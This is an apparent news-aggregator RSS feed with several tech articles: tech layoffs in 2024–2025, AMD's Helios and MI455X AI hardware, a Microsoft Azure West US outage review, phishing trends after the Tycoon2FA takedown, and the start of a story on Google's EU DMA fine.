<p class="wp-block-paragraph">Software maker Autodesk is laying off 1,350 staff. With the rise of subscription and multi-year contracts billed annually, and self-service enablement, it finds it needs fewer sales staff, <a href="https://adsknews.autodesk.com/en/news/022725-employee-message/">CEO Andrew Anagnost said in a message to employees</a>. And with its cloud, platform, and AI products proving most profitable, it’s concentrating its staff and investments there. </p>



<h3 class="wp-block-heading">Feb. 27, 2025: HP to lay off 2,000 more</h3>



<p class="wp-block-paragraph">As part of an ongoing restructuring, HP plans to lay off up to another 2,000 workers. In recent weeks, the company has tried — unsuccessfully — to do away with telephone support staff by <a href="https://www.pcworld.com/article/2617767/hp-forced-callers-to-wait-15-minutes-before-connecting-to-support-staff.html">forcing callers to wait for at least 15 minutes</a> if they refuse to use self-service support resources online. The company swiftly backtracked, but wider job cuts are still on. </p>



<h3 class="wp-block-heading">Feb. 21, 2025: <a href="https://www.csoonline.com/article/3829710/firing-of-130-cisa-staff-worries-cybersecurity-industry.html">CISA lays off 130</a></h3>



<p class="wp-block-paragraph">Government employees get laid off too: In this case, 130 workers at the US Cybersecurity and Infrastructure Security Agency are being shown the door as a result of a DOGE decision. Cybersecurity experts are concerned that the cuts will harm the international collaborations that CISA has fostered, quite apart from their concerns about the security of the DOGE layoff process itself.</p>



<h3 class="wp-block-heading">Feb. 5, 2025: <a href="https://www.computerworld.com/article/3817887/workday-to-cut-1750-jobs-shift-focus-to-ai-and-global-expansion.html">Workday lays off 1,750</a></h3>



<p class="wp-block-paragraph">As it moves to invest more in AI and international growth, Workday is laying off 8.5% of its workforce and disposing of unused office space. Some analysts fear the cutbacks will affect the company’s customer service — unless AI can pick up the slack.</p>



<h3 class="wp-block-heading">Feb. 4, 2025: Salesforce lays off over 1,000</h3>



<p class="wp-block-paragraph">At the same time as it’s hiring sales staff for its new artificial intelligence products, Salesforce is laying off over 1,000 workers across the company, according to Bloomberg. As of June, 2024, the company had over 72,000 employees, according to its website. Salesforce did not comment on the report. In 2024 the company reportedly laid off around 1,000 staff too, in two waves: January and July.</p>



<h3 class="wp-block-heading">Jan. 14, 2025: Meta will lay off 5% of workforce</h3>



<p class="wp-block-paragraph">Mark Zuckerberg told Meta employees he intended to “move out the low performers faster” in an internal memo reported by Bloomberg. The memo announced that the company will lay off 5% of its staff, or around 3,600 staff, beginning Feb. 10. The company had already reduced its headcount by 5% in 2024 through natural attrition, the memo said. Among those leaving the company will be staff previously responsible for fact checking of posts on its social media platforms in the US, as the company begins relying on its users to police content.</p>



<h2 class="wp-block-heading">Tech layoffs in 2024</h2>



<ul class="wp-block-list">
<li>Equinix</li>



<li>AMD</li>



<li>Freshworks</li>



<li>Cisco</li>



<li>General Motors</li>



<li>Intel</li>



<li>OpenText</li>



<li>Microsoft</li>



<li>AWS</li>



<li>Dell</li>
</ul>



<h3 class="wp-block-heading">Nov. 26, 2024: <a href="https://www.networkworld.com/article/3613399/equinix-to-cut-3-of-staff-amidst-the-greatest-demand-for-data-center-infrastructure-ever.html">Equinix to cut 3% of staff</a></h3>



<p class="wp-block-paragraph">Despite intense demand for its data center capacity, Equinix is planning to lay off 3% of its workforce, or around 400 employees. The announcement followed the appointment of Adaire Fox-Martin to replace Charles Meyers as CEO and the departures of two other senior executives, CIO Milind Wagle and CISO Michael Montoya.</p>



<h3 class="wp-block-heading">Nov. 13, 2024: <a href="https://www.networkworld.com/article/3605016/amd-to-cut-4-of-workforce-to-prioritize-ai-chip-expansion-to-rival-nvidia.html#:~:text=Workforce%20reduction%20comes%20amid%20strong,shift%20in%20focus%20toward%20AI.&amp;text=Advanced%20Micro%20Devices%20(AMD)%20is,Nvidia's%20lead%20in%20the%20sector.">AMD to cut 4% of workforce</a></h3>



<p class="wp-block-paragraph">AMD will lay off around 1,000 employees as it pivots towards developing AI-focused chips, it said. The move came as a surprise to staff, as the company also reported strong quarterly earnings. </p>



<h3 class="wp-block-heading">Nov. 7, 2024: <a href="https://www.cio.com/article/3601088/freshworks-lays-off-660-about-13-percent-of-its-global-workforce-despite-strong-earnings-profits.html">Freshworks lays off 660</a></h3>



<p class="wp-block-paragraph">Enterprise software vendor Freshworks laid off around 660 staff, or around 13% of its headcount, despite reporting increased revenue and profits in its fourth fiscal quarter. The company described the layoffs as a realignment of its global workforce.</p>



<h3 class="wp-block-heading">Sept. 17, 2024: <a href="https://www.networkworld.com/article/3486901/cisco-to-cut-7-of-workforce-restructure-product-groups.html">Cisco lays off 6,000</a></h3>



<p class="wp-block-paragraph">After laying off around 4,200 staff in February, Cisco is at it again, laying off another 6,000 or around 7% of its workforce. Among the divisions affected were its threat intelligence unit, Talos Security. </p>



<h3 class="wp-block-heading">Aug. 20, 2024: <a href="https://www.cio.com/article/3489323/gm-software-layoffs-could-signal-a-shift-in-digital-transformation-strategy.html">General Motors lays off 1,000 software staff</a></h3>



<p class="wp-block-paragraph">More than 1,000 software and services staff are on the way out at General Motors, signalling that it could be rethinking its digital transformation strategy. In an internal memo, the company said that it was moving resources to its highest-priority work and flattening hierarchies.</p>



<h3 class="wp-block-heading">August 1, 2024: <a href="https://www.computerworld.com/article/3480715/intel-fires-15000-employees-as-it-intensifies-focus-on-ai.html">Intel removes 15,000 roles</a></h3>



<p class="wp-block-paragraph">Intel plans to cut its workforce by around 15% to reduce costs after a disastrous second quarter. Revenue for the three months to June 29 stagnated at around $12.8 billion, but net income fell 85% to $83 million, prompting CEO Pat Gelsinger to bring forward a company-wide meeting in order to announce that 15,000 staff would lose their jobs. “This is an incredibly hard day for Intel as we are making some of the most consequential changes in our company’s history,” Gelsinger wrote in an email to staff, continuing: “Our revenues have not grown as expected — and we’ve yet to fully benefit from powerful trends, like AI. Our costs are too high, our margins are too low. We need bolder actions to address both — particularly given our financial results and outlook for the second half of 2024, which is tougher than previously expected.”</p>



<h3 class="wp-block-heading">July 4, 2024: <a href="https://www.computerworld.es/article/2513686/opentext-despedira-a-cerca-de-1-200-empleados.html">OpenText to lay off 1,200</a></h3>



<p class="wp-block-paragraph">OpenText said it will lay off 1,200 staff, or about 1.7% of its workforce, in a bid to save around $100 million annually. It plans to hire new sales and engineering staff in other areas in 2025, it said.</p>



<h3 class="wp-block-heading">June 4, 2024: <a href="https://www.networkworld.com/article/2138075/microsoft-lays-off-staffers-from-its-azure-division.html">Microsoft lays off staff in Azure division</a></h3>



<p class="wp-block-paragraph">Microsoft laid off staff in several teams supporting its cloud services, including Azure for Operations and Mission Engineering. The company didn’t say exactly how many staff were leaving.</p>



<h3 class="wp-block-heading">April 4, 2024: <a href="https://www.cio.com/article/2081437/amazon-downsizes-aws-in-a-fresh-cost-cutting-round.html">Amazon downsizes AWS</a> in a fresh cost-cutting round</h3>



<p class="wp-block-paragraph">Amazon announced hundreds of layoffs in the sales and marketing teams of its AWS cloud services division — and also in the technology development teams for its physical retail stores, as it stepped back from efforts to generalize the “<a href="https://www.cio.com/article/2079910/amazon-drops-just-walk-out-technology-at-its-us-retail-locations.html">Just Walk Out</a>” technology built for its Amazon Fresh grocery stores. </p>



<h3 class="wp-block-heading">April 1, 2024: <a href="https://investors.delltechnologies.com/static-files/d6e82f58-d417-422f-b2f3-4d08d498abd4" target="_blank" rel="noreferrer noopener">Dell acknowledges 13,000 job cuts</a></h3>



<p class="wp-block-paragraph">Dell Technologies’ <a href="https://investors.delltechnologies.com/static-files/d6e82f58-d417-422f-b2f3-4d08d498abd4" target="_blank" rel="noreferrer noopener">latest 10K filing with the US Securities and Exchange Commission</a> disclosed that the company had laid off 13,000 employees over the course of the 2023 fiscal year; it characterized the layoffs and other reorganizational moves as cost-cutting measures. “These actions resulted in a reduction in our overall headcount,” the company said. A comparison to the previous year’s 10K filing, performed by The Register, found that Dell employed 133,000 people at that point, compared to 120,000 as of February 2024. Dell announced layoffs of 6,650 staffers on Feb. 6, but it is unclear whether those cuts were reflected in the numbers from this year’s 10K statement.</p>



<p class="wp-block-paragraph"><em><a href="https://www.computerworld.com/article/3816662/tech-layoffs-in-2024-a-timeline.html">See news of earlier layoffs.</a></em></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AMD raises the AI stakes with Helios, Venice and robotics]]></title>
<description><![CDATA[AMD executives took to the stage at its Advancing AI 2026 event in San Francisco today to detail the company’s next generation of AI infrastructure solutions, from Instinct MI455X AI accelerator GPUs and 6th Gen EPYC “Venice” CPUs, to Pensando networking, ROCm.AI software and its Helios rack-scal...]]></description>
<link>https://tsecurity.de/de/3694768/ai-nachrichten/amd-raises-the-ai-stakes-with-helios-venice-and-robotics/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694768/ai-nachrichten/amd-raises-the-ai-stakes-with-helios-venice-and-robotics/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:07 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">AMD executives took to the stage at its Advancing AI 2026 event in San Francisco today to detail the company’s next generation of AI infrastructure solutions, from Instinct MI455X AI accelerator GPUs and 6th Gen EPYC “Venice” CPUs, to Pensando networking, ROCm.AI software and its Helios rack-scale platform that ties it all together.</p>



<p class="wp-block-paragraph">AMD has been working towards rack-scale AI system solutions for years. Its ZT Systems acquisition last year added valuable engineering talent and intellectual property that is now finally bearing the real fruits. Its <a href="https://www.amd.com/en/products/rackscale-solutions/helios.html" target="_blank" rel="noreferrer noopener">Helios AI platform</a> is a major platform evolution for AMD, with shipments scheduled to begin in the second half of this year (which is here and now).</p>



<p class="wp-block-paragraph">The announcements at Advancing AI show how the company has engineered its AI platform solutions for large reasoning models, sustained inference and agentic workflows. These workloads pressure memory capacity, data movement, networking and CPU orchestration. AMD’s approach is to keep as much data close to the compute engines as possible and move it more efficiently throughout the system, but there’s deeper nuance here that’s obvious versus AMD’s chief rival, NVIDIA.  </p>



<h2 class="wp-block-heading">AMD’s MI455X targets the AI memory wall</h2>



<p class="wp-block-paragraph">The Instinct MI455X GPU is the compute engine that fuels the Helios rack, and the first GPU based on AMD’s new CDNA 5 architecture. Built with a modular mix of 2nm and 3nm chiplets, it carries 432GB of HBM4 and 23.3TB/s of peak memory bandwidth.</p>



<p class="wp-block-paragraph">Compared to AMD’s current MI355X, <a href="https://hothardware.com/news/instinct-mi400-challenge-vera-rubin" target="_blank" rel="noreferrer noopener">the MI455X offers</a> 1.5 times the memory capacity, up to 2.9 times the peak memory bandwidth and up to four times the peak matrix performance with MXFP4 and MXFP8 data types, which are lower-precision numerical formats designed to accelerate AI processing while reducing memory demands. With MXFP6 (6-bit floating point), performance is rated at up to twice that of MI355X.</p>



<p class="wp-block-paragraph">AMD also shared some actual, measured internal results using production silicon. The company claims MI455X delivers 3.8 times higher FP8 decode performance, 3.5 times more measured FP4 compute performance and between 2.5 and 3.5 times more networking bandwidth than MI355X, depending on the transfer path tested. Those figures provide more context than just numerical specifications, though they remain AMD-provided comparisons that will need independent validation.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/amd-generational-leap.jpg?quality=50&amp;strip=all&amp;w=1024" alt="AMD Instinct chart showing generational leap in performance" class="wp-image-4200600" width="1024" height="547" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">AMD</p></div>



<p class="wp-block-paragraph">The architectural choices behind the numbers are important. Reasoning models and long context windows require sizeable KV caches for maintaining AI attention states, while mixture-of-experts models frequently move large amounts of data across accelerators. MI455X should let more model data, activation states and cache remain local. New dedicated IP in hardware can transfer data while the GPU continues processing, and expanded cache and multicast capabilities are designed to reduce redundant data movement to further improve efficiency.</p>



<p class="wp-block-paragraph">The aforementioned lower-precision formats can also raise throughput and reduce memory use, but model developers still have to determine where they can be applied without unacceptable accuracy loss.</p>



<h2 class="wp-block-heading">AMD’s Helios rack takes aim at Vera Rubin</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/amd-helios-rack.jpg?quality=50&amp;strip=all&amp;w=1024" alt="AMD Helios rack" class="wp-image-4200601" width="1024" height="626" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Dave Altavilla</p></div>



<p class="wp-block-paragraph">Helios is AMD’s primary rack-scale competitor to NVIDIA’s Vera Rubin platform. Each liquid-cooled rack combines 72 MI455X GPUs, 18 single-socket Venice host CPUs and Pensando networking technologies.</p>



<p class="wp-block-paragraph">In its most complete, premium configuration, AMD rates Helios for 2.9 exaflops of low-precision AI compute, with 31TB of aggregate HBM4 capacity, 1.7PB/s of memory bandwidth, 260TB/s of bidirectional scale-up bandwidth and 43TB/s of scale-out bandwidth.</p>



<p class="wp-block-paragraph">These are formidable figures, but they are technical specifications rather than actual application benchmarks. The more consequential development is AMD’s move from collections of eight-GPU servers to a 72-GPU shared-memory domain. Models too large for one node can operate across the rack without treating every exchange as a scale-out networking transaction, which benefits large-model inference as well as training.</p>



<p class="wp-block-paragraph">AMD uses UALink over Ethernet, or UALoE, for an open standard scale-up fabric. Each MI455X provides 3.6TB/s of bidirectional scale-up bandwidth, while the complete rack delivers all-to-all connectivity through a single switch layer. AMD also claims six times more scale-out bandwidth per GPU than MI355X when MI455X is configured with three Pensando Vulcano 800 AI NICs.</p>



<p class="wp-block-paragraph">While open standards give cloud providers more control over suppliers and system design, AMD and its partners now have to prove those components can deliver the predictable performance, reliability and deployment experience customers expect from a tightly controlled, more vertically integrated platform.</p>



<p class="wp-block-paragraph">Finally, AMD designed Helios with automatic rerouting around failed links, virtual rack partitions, tray-level serviceability and rack-wide power, cooling and health monitoring. Major hyperscalers and potentially large-scale enterprise customers will likely key in on these capabilities, which can affect the availability, total cost and consistency of the AI services they consume.</p>



<h2 class="wp-block-heading">Kind of like cowbell, AMD Venice gives agentic AI more CPU</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/amd-epyc-venice-cpus.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Chart showing AMD EPYC CPU performance" class="wp-image-4200603" width="1024" height="515" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">AMD</p></div>



<p class="wp-block-paragraph">AMD’s agentic CPU messaging regarding its upcoming Venice-based EPYC processors is mostly marketing speak, but the underlying requirement is very real. An AI agent can invoke retrieval, databases, security checks, code execution and other tools before a GPU generates a response. Running many agents concurrently increases the amount of conventional compute requirements surrounding the accelerators.</p>



<p class="wp-block-paragraph">Venice scales to 256 Zen 6 cores with support for 512 threads, 16 memory channels, up to 1GB of L3 cache per socket, along with PCIe 6.0 and CXL 3.1 connectivity. AMD is also offering several Venice configurations for other applications, including general-purpose servers, high-frequency workloads, GPU hosts and high-density CPU sandbox systems used to execute agent tools.</p>



<p class="wp-block-paragraph">Treating the CPU solely as a GPU host understates its role. Gateways, tokenization, vector search, databases and short-lived code execution stress different mixes of per-core performance, thread count, memory bandwidth and I/O. Specifically, AMD’s internal testing shows Venice significantly outperforming its current EPYC 9965 Turin CPU across five parts of the agentic AI pipeline, including gateway processing, context assembly, vector search, enterprise applications and short-lived tool execution. Individual gains vary by workload, but AMD details the overall generational improvement at up to a 1.7 times lift. As with the MI455X figures though, these comparisons come from AMD and will require independent validation.</p>



<h2 class="wp-block-heading">Pensando networking and ROCm software advance</h2>



<p class="wp-block-paragraph">Keeping GPUs fed with data and coordinating traffic across racks directly affects utilization and operating costs. In fact, GPU utilization is a pretty sad state of affairs currently for some of the major frontier model providers.</p>



<p class="wp-block-paragraph">As such, Pensando networking has become central to AMD’s roadmap. Helios can connect each MI455X to as many as three 800Gbps Vulcano AI NICs, while Salina DPUs handle front-end networking and infrastructure services.</p>



<p class="wp-block-paragraph">On the software side, which is an equally critical component, AMD also introduced ROCm.AI, an AI-assisted development layer due to arrive in August. It includes reusable skills for coding agents, simplified management and Hyperloom, which can profile workloads, tune serving configurations, modify kernels and validate results.</p>



<p class="wp-block-paragraph">These tools address two persistent AMD challenges: developer efficiency and ease of use, and software tuning. Automated optimization still has to produce repeatable gains without creating hard-to-maintain code, however. And while ROCm has progressed significantly over the last few years, NVIDIA’s CUDA retains an advantage in maturity, tooling and developer familiarity.</p>



<h2 class="wp-block-heading">Customer commitments underscore rack-scale confidence</h2>



<p class="wp-block-paragraph">AMD now has commitments that give its MI450 generation and Helios considerably more weight. Meta and OpenAI have announced multi-generation agreements composed of up to 6GW of AMD compute capacity, with initial 1GW deployments planned for the second half of 2026.</p>



<p class="wp-block-paragraph">Oracle plans a 50,000-GPU public cloud cluster beginning in the third quarter, while Microsoft will deploy Helios for Azure AI inference. Finally, just before the AMD event, <a href="https://ir.amd.com/news-events/press-releases/detail/1292/amd-and-anthropic-announce-strategic-partnership-to-deploy-up-to-2-gigawatts-of-amd-instinct-mi450-series-gpus" target="_blank" rel="noreferrer noopener">Anthropic announced</a> a strategic partnership for up to 2 Gigawatts of AMD-fueled AI compute, with its first gigawatt expected online in the first half of 2027.</p>



<p class="wp-block-paragraph">Commitments of this scale reflect confidence in more than just MI455X performance. These customers are evaluating the complete architecture, including Venice CPUs, Pensando networking, ROCm software, rack integration, serviceability and AMD’s ability to deliver and execute across multiple product generations.</p>



<p class="wp-block-paragraph">There is some financial alignment behind the agreements as well. AMD issued OpenAI performance-based warrants and committed to investing up to $5 billion in Anthropic. That context matters when evaluating these deals as market validation, but these planned deployments are substantial nonetheless and put Helios on a much stronger foundation as it begins shipping.</p>



<h2 class="wp-block-heading">AMD expands its robotics and embedded foundation</h2>



<p class="wp-block-paragraph">AMD also expanded its physical AI portfolio, building on credible traction from its Xilinx-derived Kria adaptive system-on-modules and embedded technologies that are already powering robotics, machine vision and industrial automation applications.</p>



<p class="wp-block-paragraph">The new Ryzen AI Embedded X100 combines up to 16 Zen 5 CPU cores, integrated Radeon graphics, a second-generation NPU and as much as 128GB of unified LPDDR5X memory shared across its compute engines. To me this looks a lot like a repackaging and optimization of the company’s Strix Halo platform, but with specific optimizations for the embedded space. Regardless, AMD is pairing X100 with the Kria AI Robotics Developer Platform, which includes a System Module or SOM, and a new Robotics Partner Network spanning hardware, software and platform providers.</p>



<p class="wp-block-paragraph">Samples began shipping in June, with full production expected in the fourth quarter. This broader objective is to give developers a path across AMD x86 CPUs, GPUs, NPUs and FPGAs for real-time autonomous systems, rather than requiring them to assemble those hardware engines and software components independently.</p>



<h2 class="wp-block-heading">Execution for AMD is now the test</h2>



<p class="wp-block-paragraph">AMD has assembled a credible platform for the burgeoning agentic AI market that’s blowing up currently with no signs of stopping. MI455X addresses memory and data movement, Venice handles dense agentic CPU workloads, Pensando networking connects global system resources, and ROCm.AI addresses software complexity. Finally, Helios assembles these components into a true competitive threat for NVIDIA’s latest Vera Rubin platform.</p>



<p class="wp-block-paragraph">AMD’s open architecture may appeal to customers seeking supplier choice, but openness must also translate into reliable deployments, competitive total cost and software that does not require a significant rip-up. NVIDIA enters this cycle with a stronger ecosystem and far more rack-scale deployment experience. The true test will be how easily and reliably customers can integrate, operate and maintain these AMD solutions at scale.</p>



<p class="wp-block-paragraph">As it stands, AMD now has major customers and a clearly defined architecture with systems engineering expertise behind it. Delivering Helios on schedule and showing that its performance claims translate into a real production workload throughput advantage and total cost of ownership gains will determine how much the competitive gap narrows. And of course, this is in a market that is clamoring for ever-more compute resources with a seemingly insatiable demand for AI services and capacity. That’s an environment for big iron success. Now AMD just has to deliver optimized, turnkey AI platforms. This is far easier said than done, but time will soon tell as deployments take shape this year.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.computerworld.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft explains why its West US Azure and cloud services failed]]></title>
<description><![CDATA[Microsoft cloud and Azure services hosted on the West Coast of the US went down for hours on Thursday when network connectivity failed. Although services running entirely within Microsoft’s West US cloud region were unaffected, any traffic entering or leaving the facilities was affected.



Micro...]]></description>
<link>https://tsecurity.de/de/3694765/ai-nachrichten/microsoft-explains-why-its-west-us-azure-and-cloud-services-failed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694765/ai-nachrichten/microsoft-explains-why-its-west-us-azure-and-cloud-services-failed/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:06 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Microsoft cloud and Azure services hosted on the West Coast of the US went down for hours on Thursday when network connectivity failed. Although services running entirely within Microsoft’s West US cloud region were unaffected, any traffic entering or leaving the facilities was affected.</p>



<p class="wp-block-paragraph">Microsoft has now published a Preliminary Post Incident Review (PIR) of the incident, reporting that connectivity was lost for five hours between 14.44 UTC (7.44 a.m. Pacific Time) and 19.41 UTC on July 23. The problem was caused when a set of IP routes was removed in error while isolating a device for routine maintenance.<strong></strong></p>



<p class="wp-block-paragraph">Before starting the maintenance work, Microsoft checked that at least one of the two redundant paths to the facility remained operational. When it came to starting the work, however, automated systems included some additional devices in the perimeter to be isolated, and removing some IP routes that had not been included in the initial assessment.</p>



<p class="wp-block-paragraph">Customers discovered the problems very quickly, and engineers identified the issue within the first hour and started to reconnect services.  Microsoft said the disruption had been caused by some “recent fiber maintenance activity”.</p>



<p class="wp-block-paragraph">To minimize the risk of disruption from such errors in the future, Microsoft advised organizations handling mission-critical data to consider a multi-region approach.</p>



<p class="wp-block-paragraph">The Azure outage was the second significant one to hit Microsoft this year. In February, <a href="https://www.networkworld.com/article/4127142/azure-outage-disrupts-vms-and-identity-services-for-over-10-hours.ht">there was a 10-hour disruption to US West and US East regions</a>.</p>



<p class="wp-block-paragraph"><em>This article first appeared on Network World.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Email threats changed after the Tycoon2FA take-down]]></title>
<description><![CDATA[Traditional phishing techniques are in decline as a result of the disruption of the Tycoon2FA phishing-as-a-service (PHaaS) platform, Microsoft said in a new report, “Email threat landscape: Q2 2026 trends and insights”.



“Phishing volume linked to the platform fell 92% from pre-disruption aver...]]></description>
<link>https://tsecurity.de/de/3694766/ai-nachrichten/email-threats-changed-after-the-tycoon2fa-take-down/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694766/ai-nachrichten/email-threats-changed-after-the-tycoon2fa-take-down/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:06 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Traditional phishing techniques are in decline as a result of the <a href="https://www.csoonline.com/article/4140890/microsoft-leads-takedown-of-tycoon2fa-phishing-service-infrastructure.html">disruption of the Tycoon2FA phishing-as-a-service (PHaaS) platform</a>, Microsoft said in a new report, “Email threat landscape: Q2 2026 trends and insights”.</p>



<p class="wp-block-paragraph">“Phishing volume linked to the platform fell 92% from pre-disruption averages, including QR code phishing and CAPTCHA-gated phishing both declining from their March highs,” the company wrote in <a href="https://www.microsoft.com/en-us/security/blog/2026/07/23/email-threat-landscape-q2-2026-trends-and-insights/">the report</a>.</p>



<p class="wp-block-paragraph">The takedown reduced activity across multiple phishing categories, forcing attackers to shift to newer delivery methods.</p>



<p class="wp-block-paragraph">Riding this shift in were a few notable phishing campaigns, including an automated <a href="https://www.csoonline.com/article/575559/business-email-compromise-scams-take-new-dimension-with-multi-stage-attacks.html">business email compromise</a> (BEC) campaign that reached 42,000 organizations in under three hours, and a multi-stage phishing campaign that used nested email (EML) files, calendar invitations, and a Microsoft authentication redirect to deliver malware.</p>



<p class="wp-block-paragraph">To counter phishing attacks, Microsoft recommends blocking emails containing known bad URLs/ subject fields, enabling password-less authentication methods, or moving to <a href="https://www.csoonline.com/article/4176814/security-experts-caution-mfa-alone-can-no-longer-stop-threat-actors.html">MFA</a> for accounts that still require passwords.</p>



<h2 class="wp-block-heading">Tycoon2FA disruption sent attackers exploring</h2>



<p class="wp-block-paragraph">The take-down of <a href="https://www.csoonline.com/article/4100393/hybrid-2fa-phishing-kits-are-making-attacks-harder-to-detect.html">Tycoon2FA</a> forced its operators to abandon portions of their infrastructure and rework hosting, domain registrations, and delivery mechanisms.</p>



<p class="wp-block-paragraph">“After falling 15% in March and another 22% in April, Tycoon2FA-linked phishing volume dropped 74% in May to just 1.5 million messages, then fell another 20% in June to 1.2 million, by far the lowest monthly volumes observed in at least a year,” Microsoft said.</p>



<p class="wp-block-paragraph">The decline extended to QR Code <a href="https://www.csoonline.com/article/3557585/attackers-are-using-qr-codes-sneakily-crafted-in-ascii-and-blob-urls-in-phishing-emails.html">lures</a> and fake CAPTCHA <a href="https://www.csoonline.com/article/3829416/fake-captcha-attacks-are-increasing-say-experts.html">pages</a>, two phishing techniques in which Tycoon2FA accounted for 12% and 14% of industry activity in June, respectively. This indicated that the platform’s customer base had not been able to migrate to a replacement infrastructure.</p>



<p class="wp-block-paragraph">But cutting off one head of the hacker hydra only gave rise to new tactics elsewhere.</p>



<p class="wp-block-paragraph">The adaptation came in the form of using Microsoft <a href="https://www.csoonline.com/article/4160858/attackers-abuse-microsoft-teams-to-impersonate-the-it-helpdesk-in-a-new-enterprise-intrusion-playbook.html">Teams as a social engineering channel</a>. Attackers established conversations to build trust before attempting credential theft or delivering malicious payloads. “Teams-based phishing volume climbed steadily throughout Q2, with the average number of detected attacks rising 19% from March to April, holding roughly flat into May (+1%), then increasing another 10% into June,” Microsoft said.</p>



<p class="wp-block-paragraph">Microsoft also observed a highly automated BEC campaign that reached over 67,000 users using scripted emails, Amazon Simple Email Service (SES), and engagement tracking, alongside a separate phishing campaign targeting 107,000 users that abused Microsoft’s authentication flow and trusted cloud services, including Teams archive recording and ICS calendar invite, to disguise malware delivery behind legitimate infrastructure.</p>



<h2 class="wp-block-heading">Phishing changes but the defense doesn’t</h2>



<p class="wp-block-paragraph">While QR Code and Captcha-based phishing attacks dropped significantly in the second quarter, business email compromise (BEC) charted jumped 121% between March and April, before dropping down again in May.</p>



<p class="wp-block-paragraph">QR Code phishing represented 8.3 million attacks in June 2026, down from a peak of 18.7 million in March. Similarly, Captcha-gated phishing fell from 12 million attacks in March to 2.2 million in June.</p>



<p class="wp-block-paragraph">BEC attacks hit 9 million in March, falling to 3.9 million in June.</p>



<p class="wp-block-paragraph">But even as these phishing classics lost momentum and newer techniques emerged, Microsoft’s defensive advice remained rooted in the basics. It noted organizations should complement email filtering with phishing-resistant authentication such as passkeys and phishing-resistant <a href="https://www.csoonline.com/article/3535222/mfa-adoption-is-catching-up-but-is-not-quite-there.html">MFA</a> to reduce the effectiveness of credential theft campaigns.</p>



<p class="wp-block-paragraph">The company also recommended strengthening Exchange Online Protection and Microsoft Defender for Office 365 with capabilities such as Safe links and Zero-hour Auto Purge (ZAP), in which malicious emails already delivered to mailboxes are removed before they are read, alongside enforcing password-less authentication methods like Windows Hello, <a href="https://www.csoonline.com/article/4040128/fido-undermined.html">FIDO </a>keys, and Microsoft Authenticator.</p>



<p class="wp-block-paragraph">Microsoft concluded its report with a list of indicators of compromise (IoCs) from the threats observed in the quarter to support detection efforts.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.csoonline.com/article/4201146/tycoon2fa-takedown-reshapes-the-phishing-landscape.html">CSO</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google fined $1 billion for anticompetitive search and mobile app practices in EU]]></title>
<description><![CDATA[The European Commission has fined Google a total of €890 million ($1 billion) for its breaches of the Digital Market Act (DMA).



Just over half the fine — €460 million — was because Google illegally gave preference to its own services in Google Search results.



The remainder was because in th...]]></description>
<link>https://tsecurity.de/de/3694767/ai-nachrichten/google-fined-1-billion-for-anticompetitive-search-and-mobile-app-practices-in-eu/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694767/ai-nachrichten/google-fined-1-billion-for-anticompetitive-search-and-mobile-app-practices-in-eu/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:06 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The European Commission has fined Google a total of €890 million ($1 billion) for its breaches of the Digital Market Act (DMA).</p>



<p class="wp-block-paragraph">Just over half the fine — €460 million — was because Google illegally gave preference to its own services in Google Search results.</p>



<p class="wp-block-paragraph">The remainder was because in the Google Play store for Android apps, the company prevented app developers from leading consumers to alternative, often cheaper, purchase channels. Under the DMA, app developers who distribute their apps via Google Play or Apple’s App Store should be able to inform customers of alternative offers.</p>



